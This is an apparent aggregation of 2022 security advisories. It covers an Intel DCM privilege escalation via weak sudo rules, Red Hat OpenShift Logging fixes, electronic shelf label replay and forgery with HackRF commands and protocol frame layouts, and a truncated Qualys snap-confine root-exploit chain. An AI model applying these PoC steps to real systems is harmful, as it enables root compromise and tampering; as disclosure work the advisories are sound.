fix2022-08-09: Vendor releases advisory INTEL-SA-006622022-12-01: Public disclosure9. REFERENCES==============https://www.rcesecurity.com/2022/12/from-zero-to-hero-part-2-intel-dcm-sql-injection-to-rce-cve-2022-21225/https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00662.htmlhttps://github.com/MrTuxracer/advisories

Intel Data Center Manager 4.1 SQL Injection

Red Hat Security Advisory 2022-8889-01 - This is an Openshift Logging bug fix release. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Openshift Logging 5.3.14 bug fix release and security update  
Advisory ID:       RHSA-2022:8889-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8889  
Issue date:        2022-12-08  
CVE Names:         CVE-2016-3709 CVE-2020-35525 CVE-2020-35527   
                   CVE-2020-36516 CVE-2020-36518 CVE-2020-36558   
                   CVE-2021-3640 CVE-2021-30002 CVE-2022-0168   
                   CVE-2022-0561 CVE-2022-0562 CVE-2022-0617   
                   CVE-2022-0854 CVE-2022-0865 CVE-2022-0891   
                   CVE-2022-0908 CVE-2022-0909 CVE-2022-0924   
                   CVE-2022-1016 CVE-2022-1048 CVE-2022-1055   
                   CVE-2022-1184 CVE-2022-1292 CVE-2022-1304   
                   CVE-2022-1355 CVE-2022-1586 CVE-2022-1785   
                   CVE-2022-1852 CVE-2022-1897 CVE-2022-1927   
                   CVE-2022-2068 CVE-2022-2078 CVE-2022-2097   
                   CVE-2022-2509 CVE-2022-2586 CVE-2022-2639   
                   CVE-2022-2938 CVE-2022-3515 CVE-2022-20368   
                   CVE-2022-21499 CVE-2022-21618 CVE-2022-21619   
                   CVE-2022-21624 CVE-2022-21626 CVE-2022-21628   
                   CVE-2022-22624 CVE-2022-22628 CVE-2022-22629   
                   CVE-2022-22662 CVE-2022-22844 CVE-2022-23960   
                   CVE-2022-24448 CVE-2022-25255 CVE-2022-26373   
                   CVE-2022-26700 CVE-2022-26709 CVE-2022-26710   
                   CVE-2022-26716 CVE-2022-26717 CVE-2022-26719   
                   CVE-2022-27404 CVE-2022-27405 CVE-2022-27406   
                   CVE-2022-27950 CVE-2022-28390 CVE-2022-28893   
                   CVE-2022-29581 CVE-2022-30293 CVE-2022-34903   
                   CVE-2022-36946 CVE-2022-37434 CVE-2022-39399   
                   CVE-2022-42003 CVE-2022-42004 CVE-2022-42898   
=====================================================================

1. Summary:

Openshift Logging Bug Fix Release (5.3.14)

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Openshift Logging Bug Fix Release (5.3.14)

Security Fixe(s):

* jackson-databind: denial of service via a large depth of nested  
objects (CVE-2020-36518)

* jackson-databind: deep wrapper array nesting wrt  
UNWRAP_SINGLE_VALUE_ARRAYS (CVE-2022-42003)

* jackson-databind: use of deeply nested arrays (CVE-2022-42004)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which  
will be updated shortly, for detailed release notes:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply  
this update:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html

4. Bugs fixed (https://bugzilla.redhat.com/):

2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects  
2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS  
2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays

5. JIRA issues fixed (https://issues.jboss.org/):

LOG-3293 - log-file-metric-exporter container has not limits exhausting the resources of the node

6. References:

https://access.redhat.com/security/cve/CVE-2016-3709  
https://access.redhat.com/security/cve/CVE-2020-35525  
https://access.redhat.com/security/cve/CVE-2020-35527  
https://access.redhat.com/security/cve/CVE-2020-36516  
https://access.redhat.com/security/cve/CVE-2020-36518  
https://access.redhat.com/security/cve/CVE-2020-36558  
https://access.redhat.com/security/cve/CVE-2021-3640  
https://access.redhat.com/security/cve/CVE-2021-30002  
https://access.redhat.com/security/cve/CVE-2022-0168  
https://access.redhat.com/security/cve/CVE-2022-0561  
https://access.redhat.com/security/cve/CVE-2022-0562  
https://access.redhat.com/security/cve/CVE-2022-0617  
https://access.redhat.com/security/cve/CVE-2022-0854  
https://access.redhat.com/security/cve/CVE-2022-0865  
https://access.redhat.com/security/cve/CVE-2022-0891  
https://access.redhat.com/security/cve/CVE-2022-0908  
https://access.redhat.com/security/cve/CVE-2022-0909  
https://access.redhat.com/security/cve/CVE-2022-0924  
https://access.redhat.com/security/cve/CVE-2022-1016  
https://access.redhat.com/security/cve/CVE-2022-1048  
https://access.redhat.com/security/cve/CVE-2022-1055  
https://access.redhat.com/security/cve/CVE-2022-1184  
https://access.redhat.com/security/cve/CVE-2022-1292  
https://access.redhat.com/security/cve/CVE-2022-1304  
https://access.redhat.com/security/cve/CVE-2022-1355  
https://access.redhat.com/security/cve/CVE-2022-1586  
https://access.redhat.com/security/cve/CVE-2022-1785  
https://access.redhat.com/security/cve/CVE-2022-1852  
https://access.redhat.com/security/cve/CVE-2022-1897  
https://access.redhat.com/security/cve/CVE-2022-1927  
https://access.redhat.com/security/cve/CVE-2022-2068  
https://access.redhat.com/security/cve/CVE-2022-2078  
https://access.redhat.com/security/cve/CVE-2022-2097  
https://access.redhat.com/security/cve/CVE-2022-2509  
https://access.redhat.com/security/cve/CVE-2022-2586  
https://access.redhat.com/security/cve/CVE-2022-2639  
https://access.redhat.com/security/cve/CVE-2022-2938  
https://access.redhat.com/security/cve/CVE-2022-3515  
https://access.redhat.com/security/cve/CVE-2022-20368  
https://access.redhat.com/security/cve/CVE-2022-21499  
https://access.redhat.com/security/cve/CVE-2022-21618  
https://access.redhat.com/security/cve/CVE-2022-21619  
https://access.redhat.com/security/cve/CVE-2022-21624  
https://access.redhat.com/security/cve/CVE-2022-21626  
https://access.redhat.com/security/cve/CVE-2022-21628  
https://access.redhat.com/security/cve/CVE-2022-22624  
https://access.redhat.com/security/cve/CVE-2022-22628  
https://access.redhat.com/security/cve/CVE-2022-22629  
https://access.redhat.com/security/cve/CVE-2022-22662  
https://access.redhat.com/security/cve/CVE-2022-22844  
https://access.redhat.com/security/cve/CVE-2022-23960  
https://access.redhat.com/security/cve/CVE-2022-24448  
https://access.redhat.com/security/cve/CVE-2022-25255  
https://access.redhat.com/security/cve/CVE-2022-26373  
https://access.redhat.com/security/cve/CVE-2022-26700  
https://access.redhat.com/security/cve/CVE-2022-26709  
https://access.redhat.com/security/cve/CVE-2022-26710  
https://access.redhat.com/security/cve/CVE-2022-26716  
https://access.redhat.com/security/cve/CVE-2022-26717  
https://access.redhat.com/security/cve/CVE-2022-26719  
https://access.redhat.com/security/cve/CVE-2022-27404  
https://access.redhat.com/security/cve/CVE-2022-27405  
https://access.redhat.com/security/cve/CVE-2022-27406  
https://access.redhat.com/security/cve/CVE-2022-27950  
https://access.redhat.com/security/cve/CVE-2022-28390  
https://access.redhat.com/security/cve/CVE-2022-28893  
https://access.redhat.com/security/cve/CVE-2022-29581  
https://access.redhat.com/security/cve/CVE-2022-30293  
https://access.redhat.com/security/cve/CVE-2022-34903  
https://access.redhat.com/security/cve/CVE-2022-36946  
https://access.redhat.com/security/cve/CVE-2022-37434  
https://access.redhat.com/security/cve/CVE-2022-39399  
https://access.redhat.com/security/cve/CVE-2022-42003  
https://access.redhat.com/security/cve/CVE-2022-42004  
https://access.redhat.com/security/cve/CVE-2022-42898  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5Jma9zjgjWX9erEAQh83xAAj1mTs7t69xXYjstib3b10ZSQFlaK8ZHu  
U1CEqRryyTwdLZJUBNnXcFV7S+tGPIthAzg3RCn0Tun45Kj/v296A2AF8DoKPRmu  
LZUUi6c5K0vFLTG2zbO0Gxy0rOcxwHmq9QLsQii3AylhXH9BOlJC+VeeaLdJXmd3  
7Zwg2Y2opzSYPph1yc/9yf24ln6thgSmFU7lsY60EiPN9GGPXTFKnTbWDNrfRCvy  
LJTOYISYm8miRC3TsQ/Nt31an3uSE5e6x4aVEXM12TvZTRL4GCcxbBWK3VSScbg8  
T7C98yEWNEwouXMNoQr9MGxPwgmUZ8WsgmzYMWOdKABPk5wcQPqC9pfLtamI+AOM  
TZQUy3TfdTxo79Tkhd5QVOnM0WD/3VWtv/OXTcObhacyifzk3kdr5W8D9PqwMp67  
4OiyX+bZlZAXKkLuD2IAeNsqP6wafFGPw79IGRSd5ggNRFIj9gJECxxHc+tvQR7F  
m6zIWSkjacYUfI8KEI8729qGxwGhqPHHcBS2nAm5pnxXt/3/07BkagQl+5cYW8rS  
3rTwx93v6U6F1e7H3FzpucrVDNHK406j3qhKBKHHDr12IPL8Q47dJuTFK9LxhKD8  
dGEbNbW23wEkGFjh9BKnac10mPx7uBhQBVmfIrpkgBQhUA6lY7+elso2pVt/FLYw  
ouxkTmp3LIQ=  
=PYNA  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8889-01

The latest version (5.1) and all prior versions of Intel's Data Center Manager are vulnerable to a local privileges escalation vulnerability using the application user "dcm" used to run the web application and the rest interface. An attacker who gained remote code execution using this dcm user (i.e., through Log4j) is then able to escalate their privileges to root by abusing a weak sudo configuration for the "dcm" user.

RCE Security Advisory  
https://www.rcesecurity.com

1. ADVISORY INFORMATION  
=======================  
Product:        Intel Data Center Manager  
Vendor URL:     https://www.intel.com/content/www/us/en/developer/tools/data-center-manager-console/overview.html  
Type:           Incorrect Use of Privileged APIs [CWE-648]  
Date found:     2022-07-16  
Date published: 2022-12-07  
CVSSv3 Score:   7.4 (CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)  
CVE:            -

2. CREDITS  
==========  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.

3. VERSIONS AFFECTED  
====================  
Intel Data Center Manager 5.1 (latest) and below

4. INTRODUCTION  
===============  
Energy costs are the fastest rising expense for today’s data centers. Intel® Data  
Center Manager (Intel® DCM) provides real-time power and thermal consumption data,  
giving you the clarity you need to lower power usage, increase rack density, and  
prolong operation during outages.

(from the vendor's homepage)

5. VULNERABILITY DETAILS  
========================  
The latest version (5.1) and all prior versions of Intel's DCM are vulnerable to a  
local privileges escalation vulnerability using the application user "dcm" used to  
run the web application and the rest interface. An attacker who gained RCE using  
this dcm user (i.e., through Log4j) is then able to escalate their privileges to  
root by abusing a weak Sudo configuration for the "dcm" user:

dcm ALL=(ALL) NOPASSWD:/usr/local/bin/SDPTool  
dcm ALL=(ALL) NOPASSWD:/usr/bin/cp  
dcm ALL=(ALL) NOPASSWD:/usr/bin/chmod

The Intel Server Debug and Provisioning Tool (SDP Tool) must be installed for the  
Data Center Manager to be vulnerable. Successful exploits can allow an authenticated  
attacker to execute commands as root. In this way, the attacker can compromise the  
victim system's entire confidentiality, integrity, and availability, thereby allowing  
to persist within the attached network.

6. PROOF OF CONCEPT  
===================  
Just one way of exploitation is by replacing the current sudoers configuration:

1.Create a new sudoers configuration file using the compromised "dcm" user in i.e. /tmp/  
2.sudo chmod 440 /tmp/sudoers  
3.sudo cp sudoers /etc/sudoers  
4.sudo /bin/bash

7. SOLUTION  
===========  
None. Intel thinks that this is not a vulnerability and therefore does also not assign  
a CVE for it.

8. REPORT TIMELINE  
==================  
2022-07-16: Discovery of the vulnerability  
2022-07-16: Reported to vendor via their bug bounty program  
2022-07-18: Vendor response: Sent to "appropriate reviewers"  
2022-07-26: Vendor states that the vulnerability "depends on something that does not exist (eg; RCE)."  
2022-07-26: Sent a clarification that a compromise of the "dcm" account is indeed necessary, but there have been RCEs in the past (i.e. through Log4j)  
2022-09-22: Vendor has troubles to reproduce the bug and asks for another PoC  
2022-09-22: Sent a clarification about the PoC  
2022-09-22: Vendor states that the report "does not clearly demonstrate a vulnerability in DCM" and the report will be closed.  
2022-09-23: Provided the vendor with a PoC utilizing Log4shell (CVE-2021-44228) in a former version of DCM  
2022-10-10: Vendor asks whether the Log4shell bug is still reproducible in the latest version of DCM  
2022-10-10: Made clear that Log4shell is not the point about the report  
2022-10-11: Vendor states "We do not clearly see a a vulnerability demonstrated in DCM"  
2022-10-12: [Back and forth about the provided PoCs]  
2022-10-12: I'm giving up.  
2022-12-07: Public disclosure

9. REFERENCES  
==============  
https://github.com/MrTuxracer/advisories

Intel Data Center Manager 5.1 Local Privilege Escalation

Zhuhai Suny Technology ESL Tag suffers from replay attacks and a forgery attack allowing for the displaying of arbitrary contents.

SEC Consult Vulnerability Lab Security Advisory < 20221201-0 >  
=======================================================================  
               title: Replay attacks & Displaying arbitrary contents  
             product: Zhuhai Suny Technology ESL Tag / ETAG-TECH protocol  
                      (electronic shelf labels)  
  vulnerable version: All  
       fixed version: -  
          CVE number: CVE-2022-45914  
              impact: critical  
            homepage: http://www.zhsuny.com/  
               found: 2022-05-27  
                  by: Steffen Robertz (Office Vienna)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Zhuhai Suny Technology Co., Ltd, founded in 2016 and located in Zhuhai  
Guangdong, is the manufacturer of electronic shelf labels and Alibaba  
Super Key Account Gold Supplier specializing in ESL with over 10 years’  
experiences focusing on helping customers reduce cost and boost sales.

Since its founding, Suny has attached great importance to exploring  
both international and domestic markets, thus becoming China’s top 1  
manufacturer of electronic shelf labels. Its products have been widely  
applied in supermarkets, retail stores, pharmacies, warehouses,  
exhibitions, etc. We has currently provided services to customers from  
more than 180 countries, and total sales in 2020 have exceeded  
15 million US dollars."

Source: http://www.zhsuny.com/profile/

Business recommendation:  
------------------------  
The vendor did not respond to our communication attempts, there is no patch  
available. In case you are using the product, contact the vendor and urge  
them to fix the security vulnerabilities.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

The research has also been presented at various security conferences such as  
hardwear.io, named "Self-labeling electronic shelf labels".

Vulnerability overview/description:  
-----------------------------------  
1) Replay Attack  
The displayed information on the price tag can be updated via a 433 MHz  
custom protocol (called ETAG-TECH). An attacker can record transmitted  
RF samples and replay them later to cause the same action. Thus, it is  
possible to restore an older price on the tag without the need for any  
information about the protocol or tag.

2) Forging ETAG-TECH protocol messages to display arbitrary content (CVE-2022-45914)  
The ETAG-TECH protocol was reverse engineered. It was noted, that no  
authentication is existent. Hence, one can display arbitrary content  
on the electronic tag by simply transmitting messages according to the  
protocol.

Proof of concept:  
-----------------  
1) Replay Attack  
The tag and base station communicate at 433.264 MHz. Thus, the following  
HackRF command can be used to record a transmission:  
hackrf_transfer -r /tmp/old_price -f 433264000 -s 4000000 -a 1 -x 43 -l 16 -g 20

The following command was used in order to replay the signal:  
hackrf_transfer -t /tmp/old_price -f 433264000 -s 4000000 -a 1 -x 43 -l 16 -g 20

A video of the attack has been published here: https://youtu.be/hj_ao25HU1E

2) Forging ETAG-TECH protocol messages to display arbitrary content (CVE-2022-45914)  
The base station will transmit a compressed image to the tag. Thus,  
any content can be displayed.

Following steps will have to happen:  
    I) Send wake-up frames to the tag.  
   II) Compress the picture that should be displayed.  
  III) Wrap the compressed picture into the picture data structure.  
   IV) Split the data structure into the image frames.  
    V) Listen for the tag's response.

I) The Wake-up Frame:  
The CRC is calculated over the whole frame, starting with the frame length  
field. The frame counter is counting down to zero. Every unique frame  
(=unique frame counter) is sent five times. The frame is transmitted at  
175 kBaud.

|     Preamble     | Sync Header | Frame Length | Tag ID | Fixed Value | Frame Counter | Fixed Value | CRC16 |  
|------------------|-------------|--------------|--------|-------------|---------------|-------------|-------|  
| AAAAAAAAAAAAAAAA |  D391D391   |      08      | 065302 |     0000    |      0398     |      0A     | CRC   |

II) The Compression Algorithm:  
Runlength encoding is used as compression algorithm. The image is read in  
rows. An "a" stands for either a 1 or 0, depending on if it's a run of  
ones or zeros that is being encoded. A "c" stands for the length of the  
run.

There are four different cases:

Case 1: Less than 8 consecutive bits  
0b1aaaaaaa  
Case 2: Less than 32 consecutive bits  
0b0acccccc  
Case 3: Less than 256 consecutive bits  
0b1a000000 0bcccccccc  
Case 4: Less than 2^16 consecutive bits  
0b0a000000 0bcccccccc 0bcccccccc

III) The picture data structure  
The compression header indicates the color channel:  
FC00000000 = black  
FC80000000 = red

|   LED   | Batch Code | Fixed Value | LED Time | Compression header | Display Height | Display Width | Compressed Image Data   |  
|---------|------------|-------------|----------|--------------------|----------------|---------------|-------------------------|  
|   0700  |    BF75    |     00ED    |   000A   |      FC00000000    |      007F      |      0127     | <Compressed Image Data> |

IV) The Image Frames  
Image frames can only hold 54 Bytes of data. Thus the previously generated  
image data structure is split into chunks of 54 bytes or less.  
The CRC is calculated over the whole frame, starting with the frame length  
field. The frame counter indicates frame 1 out of 9. The frame is transmitted  
at 100 kBaud.

|     Preamble     | Sync Header | Frame Length | Tag ID | Frame Counter | Fixed Value |         Payload        | CRC16 |  
|------------------|-------------|--------------|--------|---------------|-------------|------------------------|-------|  
| AAAAAAAAAAAAAAAA |  D391D391   |      08      | 065302 |      0901     |      33     | <Image Data Structure> |  CRC  |

V) The Tag's Response  
The frame is transmitted at 100 kBaud and repeated three times.

|     Preamble     | Sync Header | Frame Length | Tag ID | Battery Voltage |    RSSI     | Temperature | CRC16 |  
|------------------|-------------|--------------|--------|-----------------|-------------|-------------|-------|  
| AAAAAAAAAAAAAAAA |  D391D391   |      07      | 065302 |    1D = 2.9V    |    2068     |  E9 = 23.3C |  CRC  |

Following these steps, custom images can be sent over the ETAG-TECH protocol.  
The only required information is the tag ID which is printed on the tag.  
Otherwise it can be sniffed by listening to the RF interface and waiting for base  
station communication. Thus, the tag can be fully controlled by an attacker.

Videos of the attack have been published here:  
* Displaying arbitrary tag contents: https://youtu.be/028Gn4VC8yE  
* Receiving arbitrary ESL-TECH messages: https://youtu.be/x7t0QViu2gU

Vulnerable / tested versions:  
-----------------------------  
No version information could be identified for this product.

Vendor contact timeline:  
------------------------  
2022-08-14: Contacting vendor through info@zhsuny.com.cn and zhsuny@yeah.net  
             No response.  
2022-08-27: Contacting vendor through st@zhsuny.com.cn, no response.  
2022-09-12: Contacting vendor again, communicating public release for October  
             No response.  
2022-12-01: Public release of security advisory.

Solution:  
---------  
The vendor did not respond to our communication attempts, there is no patch  
available. In case you are using the product, contact the vendor and urge them  
to fix the security vulnerabilities.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Robertz / @2022

Zhuhai Suny Technology ESL Tag Forgery / Replay Attacks

Qualys discovered a race condition (CVE-2022-3328) in snap-confine, a SUID-root program installed by default on Ubuntu. In this advisory,they tell the story of this vulnerability (which was introduced in February 2022 by the patch for CVE-2021-44731) and detail how they exploited it in Ubuntu Server (a local privilege escalation, from any user to root) by combining it with two vulnerabilities in multipathd (an authorization bypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973).

    Qualys Security AdvisoryRace condition in snap-confine's must_mkdir_and_open_with_perms()(CVE-2022-3328)========================================================================Contents========================================================================SummaryBackgroundExploitationAcknowledgmentsTimeline    I can't help but feel a missed opportunity to integrate lyrics from    one of the best songs ever: [SNAP! - The Power (Official Video)]        -- https://twitter.com/spendergrsec/status/1494420041076461570========================================================================Summary========================================================================We discovered a race condition (CVE-2022-3328) in snap-confine, aSUID-root program installed by default on Ubuntu. In this advisory, wetell the story of this vulnerability (which was introduced in February2022 by the patch for CVE-2021-44731) and detail how we exploited it inUbuntu Server (a local privilege escalation, from any user to root) bycombining it with two vulnerabilities in multipathd (an authorizationbypass and a symlink attack, CVE-2022-41974 and CVE-2022-41973):https://www.qualys.com/2022/10/24/leeloo-multipath/leeloo-multipath.txt========================================================================Background========================================================================    Like the crack of the whip, I Snap! attack    Radical mind, day and night all the time        -- SNAP! - The PowerIn February 2022, we published CVE-2021-44731 in our "Lemmings" advisory(https://www.qualys.com/2022/02/17/cve-2021-44731/oh-snap-more-lemmings.txt):to set up a snap's sandbox, snap-confine created the temporary directory/tmp/snap.$SNAP_NAME or reused it if it already existed, even if it didnot belong to root; a local attacker could race against snap-confine,retain control over /tmp/snap.$SNAP_NAME, and eventually obtain fullroot privileges.This vulnerability was patched by commit acb2b4c ("cmd/snap-confine:Prevent user-controlled race in setup_private_mount"), which introduceda new helper function, must_mkdir_and_open_with_perms():------------------------------------------------------------------------142 static void setup_private_mount(const char *snap_name)...169         sc_must_snprintf(base_dir, sizeof(base_dir), "/tmp/snap.%s", snap_name);...176         base_dir_fd = must_mkdir_and_open_with_perms(base_dir, 0, 0, 0700);------------------------------------------------------------------------ 55 static int must_mkdir_and_open_with_perms(const char *dir, uid_t uid, gid_t gid, 56                                           mode_t mode) .. 61  mkdir: .. 67         if (mkdir(dir, 0700) < 0 && errno != EEXIST) { .. 70         fd = open(dir, O_RDONLY | O_DIRECTORY | O_CLOEXEC | O_NOFOLLOW); .. 81         if (fstat(fd, &st) < 0) { .. 84         if (st.st_uid != uid || st.st_gid != gid 85             || st.st_mode != (S_IFDIR | mode)) {...130                 if (rename(dir, random_dir) < 0) {...135                 goto mkdir;------------------------------------------------------------------------- the temporary directory /tmp/snap.$SNAP_NAME is created at line 67, if  it does not exist already;- if it already exists, and if it does not belong to root (at line 84),  then it is moved out of the way (at line 130) by rename()ing it to a  random directory in /tmp, and its creation is retried (at line 135).When we reviewed this patch back in December 2021, we felt very nervousabout this rename() call (because it allows a local attacker to rename()a directory they do not own), and we advised the Ubuntu Security Team toeither not reuse the directory /tmp/snap.$SNAP_NAME at all, or to createit in a non-world-writable directory instead of /tmp, or at least to userenameat2(RENAME_EXCHANGE) instead of rename(). Unfortunately, all ofthese ideas were deemed impractical (for example, renameat2() is notsupported by older kernel and glibc versions); moreover, we (Qualys)failed to come up with a feasible attack plan against this rename()call, so the patch was kept in its current form.After the release of Ubuntu 22.04 in April 2022, we decided to revisitsnap-confine and its recent hardening changes, and we finally found away to exploit the rename() call in must_mkdir_and_open_with_perms().========================================================================Exploitation========================================================================    It's getting, it's getting, it's getting kinda heavy    It's getting, it's getting, it's getting kinda hectic        -- SNAP! - The PowerThe three key ideas to exploit the rename() of /tmp/snap.$SNAP_NAME are:1/ snap-confine operates in /tmp to create a snap's temporary directory(/tmp/snap.$SNAP_NAME in setup_private_mount()), but it also operates in/tmp to create the snap's *root* directory (/tmp/snap.rootfs_XXXXXX insc_bootstrap_mount_namespace(), where all of the Xs are randomized bymkdtemp()), and the string rootfs_XXXXXX is accepted as a valid snapinstance name by sc_instance_name_validate() (when all of the Xs arelowercase alphanumeric):------------------------------------------------------------------------286 static void sc_bootstrap_mount_namespace(const struct sc_mount_config *config)...288         char scratch_dir[] = "/tmp/snap.rootfs_XXXXXX";...291         if (mkdtemp(scratch_dir) == NULL) {...303         sc_do_mount(scratch_dir, scratch_dir, NULL, MS_BIND, NULL);...319         sc_do_mount(config->rootfs_dir, scratch_dir, NULL, MS_REC | MS_BIND,...331         for (const struct sc_mount * mnt = config->mounts; mnt->path != NULL;...342                 sc_must_snprintf(dst, sizeof dst, "%s/%s", scratch_dir,343                                  mnt->path);...352                         sc_do_mount(mnt->path, dst, NULL, MS_REC | MS_BIND,------------------------------------------------------------------------2/ We therefore execute two instances of snap-confine in parallel:- we block the first snap-confine immediately after it creates its root  directory /tmp/snap.rootfs_XXXXXX at line 291 (we reliably win this  race condition by "single-stepping" snap-confine, as explained in our  "Lemmings" advisory);- we execute the second snap-confine with a snap instance name of  rootfs_XXXXXX -- i.e., the temporary directory /tmp/snap.$SNAP_NAME of  this second snap-confine is the root directory /tmp/snap.rootfs_XXXXXX  of the first snap-confine;- we kill this second snap-confine immediately after it rename()s its  temporary directory /tmp/snap.$SNAP_NAME -- i.e., the root directory  /tmp/snap.rootfs_XXXXXX of the first snap-confine -- at line 130 (we  reliably win this race condition with inotify, as explained in our  "Lemmings" advisory);- we re-create the directory /tmp/snap.rootfs_XXXXXX ourselves, and  resume the execution of the first snap-confine, whose root directory  now belongs to us.3/ We can therefore create an arbitrary symlink/tmp/snap.rootfs_XXXXXX/tmp, and sc_bootstrap_mount_namespace() willbind-mount the real /tmp directory (which is world-writable) onto anydirectory in the filesystem (because mount() will follow our arbitrarysymlink at line 352).This ability will eventually allow us to obtain full root privileges,but we must first solve three problems:------------------------------------------------------------------------Problem a/ We cannot trick snap-confine into rename()ing/tmp/snap.rootfs_XXXXXX, because this directory belongs to root andmust_mkdir_and_open_with_perms() rename()s it only if it does not belongto root!This problem solves itself naturally: indeed, /tmp/snap.rootfs_XXXXXXbelongs to the user root, but it belongs to the group of our own user,so must_mkdir_and_open_with_perms() rename()s it because it does notbelong to the group root (at line 84).------------------------------------------------------------------------Problem b/ We cannot trick snap-confine into following our symlink/tmp/snap.rootfs_XXXXXX/tmp, because sc_bootstrap_mount_namespace()bind-mounts a read-only squashfs onto /tmp/snap.rootfs_XXXXXX (at line319): if we create our symlink before this bind-mount, then it becomescovered by the squashfs; and we cannot create our symlink after thisbind-mount, because the squashfs is read-only and belongs to root!The "Prologue: CVE-2021-3996 and CVE-2021-3995 in util-linux's libmount"of our "Lemmings" advisory suggests a solution to this problem: we mustunmount /tmp/snap.rootfs_XXXXXX each time sc_bootstrap_mount_namespace()bind-mounts it (at lines 303 and 319). The "(deleted)" technique we usedin "Lemmings" (CVE-2021-3996 in util-linux) was patched in January 2022,but we found a surprisingly simple workaround:we mount a FUSE filesystem onto /tmp/snap.rootfs_XXXXXX, immediatelyafter we re-create this directory ourselves; this allows us to unmount(with fusermount -u -z) any subsequent bind-mounts (even if they belongto root), because fusermount does not check that our FUSE filesystem isindeed the most recently mounted filesystem on /tmp/snap.rootfs_XXXXXX.------------------------------------------------------------------------Problem c/ We cannot trick snap-confine into bind-mounting the real /tmponto an arbitrary directory in the filesystem (at line 352), becausesuch a bind-mount is forbidden by snap-confine's AppArmor profile!To solve this problem, we must bypass AppArmor completely, but thetechnique we used in our "Lemmings" advisory (we wrapped snap-confine'sexecution in an AppArmor profile that was in "complain" mode, not in"enforce" mode) was patched in February 2022 (by commits 26eed65 and4a2eb78, "ensure that snap-confine is in strict confinement" and"Tighten AppArmor label check"):now, snap-confine's execution must be wrapped in an AppArmor profilethat is in "enforce" mode and whose label matches the regular expression"^(/snap/(snapd|core)/x?[0-9]+/usr/lib|/usr/lib(exec)?)/snapd/snap-confine$".We were about to give up on trying to exploit snap-confine, when wediscovered CVE-2022-41974 and CVE-2022-41973 in multipathd (which isinstalled by default on Ubuntu Server): these two vulnerabilities allowus to create a directory named "failed_wwids" (user root, group root,mode 0700) anywhere in the filesystem, and we were able to transformthis very limited directory creation into a complete AppArmor bypass.AppArmor supports policy namespaces that are loosely related to kerneluser namespaces; by default, no AppArmor namespaces exist:------------------------------------------------------------------------$ ls -la /sys/kernel/security/apparmor/policy/namespacestotal 0drwxr-xr-x 2 root root 0 Aug  6 12:42 .drwxr-xr-x 5 root root 0 Aug  6 12:42 ..------------------------------------------------------------------------However, we (attackers) can create an AppArmor namespace "failed_wwids"by exploiting CVE-2022-41974 and CVE-2022-41973 in multipathd:------------------------------------------------------------------------$ ln -s /sys/kernel/security/apparmor/policy/namespaces /dev/shm/multipath$ multipathd list devices | grep 'whitelisted, unmonitored'    sda1 devnode whitelisted, unmonitored    ...$ multipathd list list path sda1fail$ ls -la /sys/kernel/security/apparmor/policy/namespacestotal 0drwxr-xr-x 3 root root 0 Aug  6 12:42 .drwxr-xr-x 5 root root 0 Aug  6 12:42 ..drwx------ 5 root root 0 Aug  6 13:38 failed_wwids------------------------------------------------------------------------Then, we can enter this AppArmor namespace by creating and entering anunprivileged user namespace:------------------------------------------------------------------------$ aa-exec -n failed_wwids -p unconfined -- unshare -U -r /bin/sh------------------------------------------------------------------------Inside this namespace, we can create an AppArmor profile labeled"/usr/lib/snapd/snap-confine" that is in "enforce" mode and allows allpossible 